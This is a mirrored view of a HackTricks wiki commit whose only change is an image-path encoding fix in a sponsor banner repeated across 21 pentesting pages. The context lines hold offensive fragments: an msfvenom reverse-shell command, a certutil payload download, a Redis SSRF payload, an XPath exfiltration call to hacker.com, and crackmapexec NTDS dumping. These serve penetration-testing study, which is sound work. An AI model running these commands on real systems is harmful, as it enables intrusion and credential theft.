mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-24 21:53:54 +00:00
d
This commit is contained in:
parent
bad2b68f25
commit
d0476b922d
21 changed files with 54 additions and 54 deletions
|
@ -61,7 +61,7 @@ Get Access Today:
|
|||
|
||||
### [HACKENPROOF](https://bit.ly/3xrrDrL)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -302,7 +302,7 @@ So broken and disappeared that I am not going to talk about it. Just know that _
|
|||
|
||||
![](<../../.gitbook/assets/image (125).png>)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -812,7 +812,7 @@ This works like an Evil-Twin but for Wi-Fi direct, you can impersonate a group o
|
|||
|
||||
TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -17,7 +17,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -195,7 +195,7 @@ msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f
|
|||
```
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -328,7 +328,7 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -584,7 +584,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -12,7 +12,7 @@
|
|||
|
||||
</details>
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -164,7 +164,7 @@
|
|||
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -63,7 +63,7 @@ adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
|
|||
```
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -257,7 +257,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -511,7 +511,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
|
|||
* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -724,7 +724,7 @@ It is able to:
|
|||
Useful to detect malware: [https://koodous.com/](https://koodous.com)
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -809,7 +809,7 @@ For more information visit:
|
|||
* [https://github.com/abhi-r3v0/Adhrit](https://github.com/abhi-r3v0/Adhrit)
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -134,7 +134,7 @@ If developers, write in Java and the code is compiled to DEX bytecode, to revers
|
|||
**Smali is the human readable version of Dalvik bytecode**. Technically, Smali and baksmali are the name of the tools (assembler and disassembler, respectively), but in Android, we often use the term “Smali” to refer to instructions. If you’ve done reverse engineering or computer architecture on compiled C/C++ code. **SMALI is like the assembly language: between the higher level source code and the bytecode**.
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -466,7 +466,7 @@ MDM or Mobile Device Management are software suits that are used to **ensure a c
|
|||
Generally the MDM solutions perform functions like enforcing password policies, forcing the encryption of storage and enable remote wiping of device data.
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -109,7 +109,7 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -126,7 +126,7 @@ The tool [https://github.com/andresriancho/mongo-objectid-predict](https://githu
|
|||
|
||||
If you are root you can **modify** the **mongodb.conf** file so no credentials are needed (_noauth = true_) and **login without credentials**.
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -167,7 +167,7 @@ winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -336,7 +336,7 @@ Entry_2:
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -17,7 +17,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -165,7 +165,7 @@ Now as can be seen below we have complete system access:
|
|||
* `port:6000 x11`
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -152,7 +152,7 @@ HGET <KEY> <FIELD>
|
|||
**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -335,7 +335,7 @@ git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agit
|
|||
_For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` scheme and not with the `http` scheme._
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -186,7 +186,7 @@ curl http://127.0.0.1:80
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -386,7 +386,7 @@ It's possible to **load a .NET dll within MSSQL with custom functions**. This, h
|
|||
There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -534,7 +534,7 @@ You probably will be able to **escalate to Administrator** following one of thes
|
|||
* [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -95,7 +95,7 @@ Entry_2:
|
|||
```
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -190,7 +190,7 @@ To set the domain name of the server in the URL that the Referrer is going to se
|
|||
***
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -597,7 +597,7 @@ with open(PASS_LIST, "r") as f:
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -429,7 +429,7 @@ It's also possible to get RCE in a vulnerable "assert" statement using the syste
|
|||
Be sure to URL-encode payloads before you send them.
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -627,7 +627,7 @@ If you include any of the files `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/pha
|
|||
{% file src="../../.gitbook/assets/en-local-file-inclusion-1.pdf" %}
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -12,7 +12,7 @@
|
|||
|
||||
</details>
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -326,7 +326,7 @@ The **reset tokens must have an expiration time**, after it the token shouldn't
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -84,7 +84,7 @@ Info about how to make queries: [https://www.w3schools.com/xml/xpath\_syntax.asp
|
|||
| //title\[@\*] | Selects all title elements which have at least one attribute of any kind |
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -327,7 +327,7 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
|
|||
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection)
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -17,7 +17,7 @@
|
|||
</details>
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -86,7 +86,7 @@ Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbos
|
|||
[**More information about AS-RRP Roasting in ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -170,7 +170,7 @@ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
|
|||
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet
|
||||
```
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
@ -342,7 +342,7 @@ Download it from:[ http://www.tarasco.org/security/pwdump\_7](http://www.tarasco
|
|||
|
||||
|
||||
|
||||
<figure><img src=".gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src=".gitbook/assets/image%20(7).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**[Follow HackenProof](https://bit.ly/3xrrDrL) to learn more about web3 bugs**
|
||||
|
||||
|
|
Loading…
Reference in a new issue